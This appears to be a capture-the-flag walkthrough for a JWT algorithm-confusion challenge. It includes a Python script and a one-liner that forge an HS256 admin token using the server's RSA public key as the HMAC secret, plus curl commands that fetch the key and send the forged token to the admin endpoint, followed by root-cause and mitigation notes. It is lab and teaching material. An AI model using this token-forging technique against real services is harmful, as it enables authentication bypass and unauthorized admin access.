JWT Algo Confusion

The challenge presents a JWT authentication system that uses RS256 algorithm. You need to exploit an algorithm confusion vulnerability to forge an admin token and access the admin panel.

1. Access the JWT authentication service at <target-ip> (you'll be automatically redirected from port 80 to the main application)
2. Login with the provided demo credentials:
   • Username: user
   • Password: password123
3. This will give you a valid JWT token signed with RS256 algorithm
4. Note the token structure and examine it using jwt.io

1. Decode the JWT token to examine its structure:
• Header: Contains algorithm (RS256) and token type
• Payload: Contains username, role (user), and expiration
• Signature: RS256 signature using private key
2. Notice that you have role 'user' but need role 'admin'
3. Test the token verification at <target-ip>/verify

1. Download the RSA public key from the endpoint:

curl -O <target-ip>/public-key

2. Or visit the URL directly in your browser
3. This downloads public_key.pem file
4. The public key will be used as the HMAC secret for HS256

1. Create a new JWT token with HS256 algorithm using the RSA public key as secret
2. Using Python to forge the admin token:

#!/usr/bin/env python3
import jwt
import datetime

# Read the RSA public key
with open('public_key.pem', 'r') as f:
    public_key = f.read()

# Create admin payload
payload = {
    'username': 'admin',
    'role': 'admin',
    'iat': datetime.datetime.utcnow(),
    'exp': datetime.datetime.utcnow() + datetime.timedelta(hours=1)
}

# Sign with HS256 using public key as secret (algorithm confusion)
# Strip PEM headers and use raw key data as HMAC secret
key_data = public_key.replace('-----BEGIN PUBLIC KEY-----', '').replace('-----END PUBLIC KEY-----', '').replace('\n', '')
admin_token = jwt.encode(payload, key_data, algorithm='HS256')
print(admin_token)

3. Alternative one-liner approach:

python3 -c "import jwt, datetime; public_key=open('public_key.pem').read(); key_data=public_key.replace('-----BEGIN PUBLIC KEY-----', '').replace('-----END PUBLIC KEY-----', '').replace('\n', ''); token=jwt.encode({'username': 'admin', 'role': 'admin', 'iat': datetime.datetime.utcnow(), 'exp': datetime.datetime.utcnow() + datetime.timedelta(hours=1)}, key_data, algorithm='HS256'); print(token.decode('utf-8') if isinstance(token, bytes) else token)"

1. Use the forged admin token to access the admin endpoint:

curl -H "Authorization: Bearer <forged_admin_token>" <target-ip>/admin

2. The vulnerable verification accepts both RS256 and HS256 algorithms
3. The admin endpoint validates the role and returns the flag

1. The admin endpoint response contains the flag:

• Algorithm Confusion: The vulnerability occurs when applications accept multiple algorithms without proper validation
• RS256 vs HS256: RS256 uses asymmetric keys (public/private), while HS256 uses symmetric keys (shared secret)
• Exploitation Method: By changing algorithm to HS256 and using the public key as HMAC secret, attackers bypass asymmetric security
• Root Cause: The application allows both 'RS256' and 'HS256' in the algorithms parameter during token verification

• Algorithm Whitelisting: Only allow specific algorithms expected by your application
• Strict Validation: Always validate the algorithm in the JWT header matches expected algorithm
• Key Management: Never expose private keys and limit public key access when possible
• Library Updates: Use updated JWT libraries that prevent algorithm confusion by default
• Algorithm Enforcement: Explicitly specify the expected algorithm in verification calls